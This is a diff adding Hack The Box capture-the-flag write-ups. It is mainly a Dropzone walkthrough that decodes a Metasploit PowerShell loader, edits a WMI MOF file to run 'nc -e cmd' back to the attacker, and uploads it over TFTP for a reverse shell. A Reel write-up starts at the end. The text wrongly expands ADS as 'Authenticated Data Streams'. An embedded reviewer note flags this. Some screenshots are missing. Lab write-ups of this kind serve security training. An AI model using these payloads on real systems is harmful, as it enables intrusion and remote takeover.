+ print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+ end
+
+ # Execute the powershell command
+ print_status("Executing the payload...")
+ begin
+ psexec(command)
+ rescue StandardError => exec_command_error
+ fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+ end
+ end
+
+
+
+Now let's generate this cmd_psh_payload() from metasploit's interactive ruby (which is like a debugger feature)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → msfconsole
+
+ , ,
+ / \
+ ((__---,,,---__))
+ (_) O O (_)_________
+ \ _ / |\
+ o_o \ M S F | \
+ \ _____ | *
+ ||| WW|||
+ ||| |||
+
+
+ =[ metasploit v6.0.22-dev ]
+ + -- --=[ 2086 exploits - 1126 auxiliary - 354 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ Metasploit tip: Metasploit can be configured at startup, see
+ msfconsole --help to learn more
+
+ msf6 > search psexec
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
+ 1 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
+ 2 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
+ 3 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
+ 4 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
+ 5 encoder/x86/service manual No Register Service
+ 6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
+ 7 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
+ 8 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
+ 9 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
+ 10 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
+
+
+ Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/smb/webexec
+
+ msf6 > use exploit/windows/smb/psexec
+ [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+ msf6 exploit(windows/smb/psexec) > show options
+
+ Module options (exploit/windows/smb/psexec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The SMB service port (TCP)
+ SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
+ SERVICE_DISPLAY_NAME no The service display name
+ SERVICE_NAME no The service name
+ SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
+ SMBDomain . no The Windows domain to use for authentication
+ SMBPass no The password for the specified username
+ SMBUser no The username to authenticate as
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST 192.168.0.18 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+
+
+So here we are in interactive ruby
+
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+ >>
+
+ >> cmd_psh_payload("IppsecRocks","x86")
+ => "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\""
+
+
+
+And here we have generated our powershell payload containing the "IppsecRocks" command, for the "x86" architecture. So first of all it compresses as gzip and base64 encodes our payload :
+
+
+
+Now we copy that base64 string and echo it out of it's base64 encryption to a file which we know is gzip:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → echo 'H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA' | base64 -d > payload.z
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → file payload.z
+ payload.z: gzip compressed data, last modified: Mon Dec 21 09:21:24 2020, max compression, from Unix, original size modulo 2^32 2169
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → zcat payload.z > payload.powershell
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → zcat payload.z
+ function hKSS {
+ Param ($doCuN, $coFTK)
+ $lnlX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+ return $lnlX.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lnlX.GetMethod('GetModuleHandle')).Invoke($null, @($doCuN)))), $coFTK))
+ }
+
+ function tdq {
+ Param (
+ [Parameter(Position = 0, Mandatory = $True)] [Type[]] $gXQa,
+ [Parameter(Position = 1)] [Type] $mrjQ = [Void]
+ )
+
+ $yJ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+ $yJ.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $gXQa).SetImplementationFlags('Runtime, Managed')
+ $yJ.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $mrjQ, $gXQa).SetImplementationFlags('Runtime, Managed')
+
+ return $yJ.CreateType()
+ }
+
+ [Byte[]]$suU = [System.Convert]::**FromBase64String("SXBwc2VjUm9ja3M=")**
+
+ $zcLY = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll VirtualAlloc), (tdq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $suU.Length,0x3000, 0x40)
+ [System.Runtime.InteropServices.Marshal]::Copy($suU, 0, $zcLY, $suU.length)
+
+ $hXm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll CreateThread), (tdq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zcLY,[IntPtr]::Zero,0,[IntPtr]::Zero)
+ [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll WaitForSingleObject), (tdq @([IntPtr], [Int32]))).Invoke($hXm,0xffffffff) | Out-Null
+
+
+
+So here we know what's the powershell payload metasploit uses and in this there's yet another base64 which is the command we wanted to execute:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → echo "SXBwc2VjUm9ja3M=" | base64 -d
+ IppsecRocks
+
+
+
+So here we see everything metasploit does just to get that powershell command in. But again, this is a x86 windows machine, we don't have powershell to work with. The next option psexec would try is the SMB file upload which does not help us either because from our previous enumeration, the smb ports are not opened. What was required to do in this box, was to check each option psexec.rb does one by one until you stumble on the correct one, which was the MOF one defined as the mof_upload function:
+
+
+ def mof_upload(smb_share)
+ share = "\\\\#{datastore['RHOST']}\\ADMIN$"
+ filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
+
+ # payload as exe
+ print_status("Trying wbemexec...")
+ print_status("Uploading Payload...")
+ if smb_share != 'ADMIN$'
+ print_error('Wbem will only work with ADMIN$ share')
+ return
+ end
+ simple.connect(share)
+ exe = generate_payload_exe
+ fd = smb_open("\\system32\\#(unknown)", 'rwct', write: true)
+ fd << exe
+ fd.close
+ print_status("Created %SystemRoot%\\system32\\#(unknown)")
+
+ # mof to cause execution of above
+ mofname = Rex::Text.rand_text_alphanumeric(14) + ".MOF"
+ mof = generate_mof(mofname, filename)
+ print_status("Uploading MOF...")
+ fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
+ fd << mof
+ fd.close
+ print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
+
+ # Disconnect from the ADMIN$
+ simple.disconnect(share)
+ end
+
+
+Here the smbfunction will try wbemexec , but it will work only if the smb share is ADMIN$ otherwise wbem wouldn't work. Then it connects, generates an exe payload, only to drop that meterpreter file into system32. Then lastly it uses the generate_mof() function and then uploads the generated payload into \\system32\\wbem\\mof\\ and then it just disconnects. Which means, that you get remote code execution just by dropping a file into that folder. now let's check generate_mof() from interactive ruby mode:
+
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+ >> generate_mof("IppsecRocks","AndIsCool")
+ => "#pragma namespace(\"\\\\\\\\.\\\\root\\\\cimv2\")\nclass MyClass773\n{\n \t[key] string Name;\n};\nclass ActiveScriptEventConsumer : __EventConsumer\n{\n \t[key] string Name;\n \t[not_null] string ScriptingEngine;\n \tstring ScriptFileName;\n \t[template] string ScriptText;\n uint32 KillTimeout;\n};\ninstance of __Win32Provider as $P\n{\n Name = \"ActiveScriptEventConsumer\";\n CLSID = \"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}\";\n PerUserInitialization = TRUE;\n};\ninstance of __EventConsumerProviderRegistration\n{\n Provider = $P;\n ConsumerClassNames = {\"ActiveScriptEventConsumer\"};\n};\nInstance of ActiveScriptEventConsumer as $cons\n{\n Name = \"ASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\ntry {var s = new ActiveXObject(\\\"Wscript.Shell\\\");\\ns.Run(\\\"AndIsCool\\\");} catch (err) {};\\nsv = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");try {sv.Delete(\\\"MyClass773\\\");} catch (err) {};try {sv.Delete(\\\"__EventFilter.Name='instfilt'\\\");} catch (err) {};try {sv.Delete(\\\"ActiveScriptEventConsumer.Name='ASEC'\\\");} catch(err) {};\";\n\n};\nInstance of ActiveScriptEventConsumer as $cons2\n{\n Name = \"qndASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\nvar objfs = new ActiveXObject(\\\"Scripting.FileSystemObject\\\");\\ntry {var f1 = objfs.GetFile(\\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\IppsecRocks\\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\\"AndIsCool\\\");\\nf2.Delete(true);\\nvar s = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");s.Delete(\\\"__EventFilter.Name='qndfilt'\\\");s.Delete(\\\"ActiveScriptEventConsumer.Name='qndASEC'\\\");\\n} catch(err) {};\";\n};\ninstance of __EventFilter as $Filt\n{\n Name = \"instfilt\";\n Query = \"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\\"MyClass773\\\"\";\n QueryLanguage = \"WQL\";\n};\ninstance of __EventFilter as $Filt2\n{\n Name = \"qndfilt\";\n Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE 
TargetInstance ISA \\\"Win32_Process\\\" AND TargetInstance.Name = \\\"AndIsCool\\\"\";\n QueryLanguage = \"WQL\";\n\n};\ninstance of __FilterToConsumerBinding as $bind\n{\n Consumer = $cons;\n Filter = $Filt;\n};\ninstance of __FilterToConsumerBinding as $bind2\n{\n Consumer = $cons2;\n Filter = $Filt2;\n};\ninstance of MyClass773 as $MyClass\n{\n Name = \"ClassConsumer\";\n};\n"
+
+
+Now from here we're going to print out the generate_mof() function by using ruby's puts (print) function:
+
+
+ >> puts generate_mof("IppsecRocks","AndIsCool")
+ #pragma namespace("\\\\.\\root\\cimv2")
+ class MyClass40351
+ {
+ [key] string Name;
+ };
+ class ActiveScriptEventConsumer : __EventConsumer
+ {
+ [key] string Name;
+ [not_null] string ScriptingEngine;
+ string ScriptFileName;
+ [template] string ScriptText;
+ uint32 KillTimeout;
+ };
+ instance of __Win32Provider as $P
+ {
+ Name = "ActiveScriptEventConsumer";
+ CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
+ PerUserInitialization = TRUE;
+ };
+ instance of __EventConsumerProviderRegistration
+ {
+ Provider = $P;
+ ConsumerClassNames = {"ActiveScriptEventConsumer"};
+ };
+ Instance of ActiveScriptEventConsumer as $cons
+ {
+ Name = "ASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
+
+ };
+ Instance of ActiveScriptEventConsumer as $cons2
+ {
+ Name = "qndASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\IppsecRocks\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"AndIsCool\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
+ };
+ instance of __EventFilter as $Filt
+ {
+ Name = "instfilt";
+ Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
+ QueryLanguage = "WQL";
+ };
+ instance of __EventFilter as $Filt2
+ {
+ Name = "qndfilt";
+ Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"AndIsCool\"";
+ QueryLanguage = "WQL";
+
+ };
+ instance of __FilterToConsumerBinding as $bind
+ {
+ Consumer = $cons;
+ Filter = $Filt;
+ };
+ instance of __FilterToConsumerBinding as $bind2
+ {
+ Consumer = $cons2;
+ Filter = $Filt2;
+ };
+ instance of MyClass40351 as $MyClass
+ {
+ Name = "ClassConsumer";
+ };
+ => nil
+ >>
+
+
+Now i'll copy this entire output into a file to edit:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → mkdir psexec
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → cd psexec
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → vim generated_mof
+
+
+
+Now from here, we see that our file will be located in \\\\\"wbem\\\\\\\\\\\\\\\mof\\\\\\\\\\\\\\\good\\\\\\\\\\\\\\\IppsecRocks\\\\\ and the command we're running is ns.Run(\"AndIsCool\") which is a javascript command. Essentially MOF works by compiling syntax like this into the wbem database to execute said code. The idea here is to create a "FilterToConsumerBinding" to tie together a "EventFilter" and a "ActiveScriptEventConsumer" so that the FilterToConsumerBinding detects the Filtered Event (which could simply be something like watch when this file appears in the wbem database), it will launch the Script
+
+(for more information about MOF check out these links: [pop pop ret mof](https://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html) and [BlackHat WMI talk from 2015 by Matt Graeber](https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf))
+
+Now let's trim the useless parts out of our generated mof file:
+
+
+ #pragma namespace("\\\\.\\root\\cimv2")
+
+ class MyClass40351
+ {
+ [key] string Name;
+ };
+
+ class ActiveScriptEventConsumer : __EventConsumer
+ {
+ [key] string Name;
+ [not_null] string ScriptingEngine;
+ string ScriptFileName;
+ [template] string ScriptText;
+ uint32 KillTimeout;
+ };
+
+ instance of __Win32Provider as $P
+ {
+ Name = "ActiveScriptEventConsumer";
+ CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
+ PerUserInitialization = TRUE;
+ };
+
+
+ instance of __EventConsumerProviderRegistration
+ {
+ Provider = $P;
+ ConsumerClassNames = {"ActiveScriptEventConsumer"};
+ };
+
+ Instance of ActiveScriptEventConsumer as $cons
+ {
+ Name = "ASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
+
+ };
+
+ instance of __EventFilter as $Filt
+ {
+ Name = "instfilt";
+ Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
+ QueryLanguage = "WQL";
+ };
+
+ instance of __FilterToConsumerBinding as $bind
+ {
+ Consumer = $cons;
+ Filter = $Filt;
+ };
+
+ instance of MyClass40351 as $MyClass
+ {
+ Name = "ClassConsumer";
+ };
+
+
+
+and from here, we don't want to run the command "AndIsCool" but we want the command "nc -e cmd 10.10.14.6 9002" so from inside vim you can run the following : **:%s/AndIsCool/nc -e cmd 10.10.14.6 9002/gi** in order to replace the AndIsCool pattern matched by regex to whatever other string we want.
+
+
+
+Now basically what this does is that our EventFilter will detect the creation of Class 27736, and when it gets created, it will launch the code we want (the netcat command)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → ls -l
+ total 4
+ -rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → locate nc.exe
+ /usr/lib/mono/4.5/cert-sync.exe
+ /usr/share/windows-resources/binaries/nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → cp /usr/share/windows-resources/binaries/nc.exe .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → ls -l
+ total 64
+ -rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
+ -rwxr-xr-x 1 nothing nothing 59392 Dec 21 11:10 nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file nc.exe
+ nc.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+
+
+So now we have the correct 32bit nc.exe file we want, now let's upload it via tftp:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> mode binary
+ tftp> put nc.exe /windows/system32/nc.exe
+ Sent 59392 bytes in 4.3 seconds
+ tftp> quit
+
+
+
+We switched from ascii to binary mode to upload our nc file properly:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
+ → l
+ total 72K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 11:10 .
+ drwxr-xr-x 3 nothing nothing 4.0K Dec 21 10:48 ..
+ -rw-r--r-- 1 nothing nothing 1.4K Dec 21 11:10 generated_mof
+ -rwxr-xr-x 1 nothing nothing 58K Dec 21 11:10 nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> put generated_mof /windows/system32/wbem/mof/ippsecrocks.mof
+
+
+
+Here basically we want to put our mof file into the /windows/system32/wbem/mof/ directory where it will be executed automatically
+
+
+
+And we get a connection! now let's try to print the root flag:
+
+## **Part 3 : Getting Root Access**
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.90] 1051
+ Microsoft Windows XP [Version 5.1.2600]
+ (C) Copyright 1985-2001 Microsoft Corp.
+
+ C:\WINDOWS\system32>type C:\Docume~1\Admini~1\Desktop\root.txt
+ type C:\Docume~1\Admini~1\Desktop\root.txt
+ It's easy, but not THAT easy...
+
+ C:\WINDOWS\system32>type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
+ type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
+ For limited time only!
+
+ Keep an eye on our **ADS** for new offers & discounts!
+
+
+And from here we see that root.txt isn't there, but in the flags directory we are hinted at ADS which stands for Authenticated Data Streams, however Windows XP does not have a method to view ADS natively, so that means we're going to download the required binary [here](https://docs.microsoft.com/en-us/sysinternals/downloads/streams):
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → wget https://download.sysinternals.com/files/Streams.zip
+ --2020-12-21 11:22:51-- https://download.sysinternals.com/files/Streams.zip
+ Resolving download.sysinternals.com (download.sysinternals.com)... 152.199.19.160
+ Connecting to download.sysinternals.com (download.sysinternals.com)|152.199.19.160|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 511505 (500K) [application/octet-stream]
+ Saving to: ‘Streams.zip’
+
+ Streams.zip 100%[===========================================================>] 499.52K --.-KB/s in 0.09s
+
+ 2020-12-21 11:22:52 (5.67 MB/s) - ‘Streams.zip’ saved [511505/511505]
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → unzip Streams.zip
+ Archive: Streams.zip
+ inflating: streams.exe
+ inflating: streams64.exe
+ inflating: streams64a.exe
+ inflating: Eula.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file streams.exe
+ streams.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+
+
+So here we're going to send the 32 bit executable obviously, and we're putting it in /windows/system32/ to avoid the need to type the absolute path everytime:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file streams.exe
+ streams.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> mode binary
+ tftp> put streams.exe /windows/system32/streams.exe
+ Sent 342392 bytes in 30.2 seconds
+
+
+
+
+ cd C:\docume~1\administrator\desktop\flags\
+ streams -accepteula
+ streams 2*
+
+
+
+And there we have it!
+
+
+
+And that's it ! we have been able to get both flags for this box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
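Review bot: the expansion of ADS in the paragraph after the `type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"` listing is wrong: ADS is Alternate Data Streams, the NTFS feature that lets one file carry extra named streams (`name.txt:stream`) that `dir` and `type` do not show, which is exactly why the Sysinternals `streams 2*` call is the right tool and why the flag was not in root.txt; "Authenticated Data Streams" should be corrected, and the XP caveat scoped (Vista and later list streams natively with `dir /r`, XP does not). Two smaller points: the output of `streams -accepteula` / `streams 2*` and the "progress graph" at the end are missing (only blank lines remain where the screenshots were), so the reader never sees which stream holds the flag; and the first `tftp> put generated_mof ...` is sent without `mode binary`, which is fine for a text MOF but deserves a sentence, since the later `put streams.exe` switches to binary for the PE file and a reader copying the first form for an executable would get a corrupt upload.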
diff --git a/Hard/11.md b/Hard/11.md
new file mode 100644
index 0000000..3a45bb9
--- /dev/null
+++ b/Hard/11.md
@@ -0,0 +1,868 @@
+# Reel Writeup
+
+
+
+## Introduction :
+
+Reel is a hard windows box released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.77 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 135/tcp on 10.10.10.77
+ Discovered open port 21/tcp on 10.10.10.77
+ Discovered open port 22/tcp on 10.10.10.77
+ Discovered open port 139/tcp on 10.10.10.77
+ Discovered open port 25/tcp on 10.10.10.77
+ Discovered open port 445/tcp on 10.10.10.77
+ Discovered open port 49159/tcp on 10.10.10.77
+ Discovered open port 593/tcp on 10.10.10.77
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -sCV -p21,22,139,25,445,593,49159 10.10.10.77
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 17:16 CET
+ Nmap scan report for 10.10.10.77
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_05-28-18 11:19PM <****DIR> documents
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
+ | 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
+ |_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
+ 25/tcp open smtp?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
+ | 220 Mail Service ready
+ | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
+ | 220 Mail Service ready
+ | sequence of commands
+ | sequence of commands
+ | Hello:
+ | 220 Mail Service ready
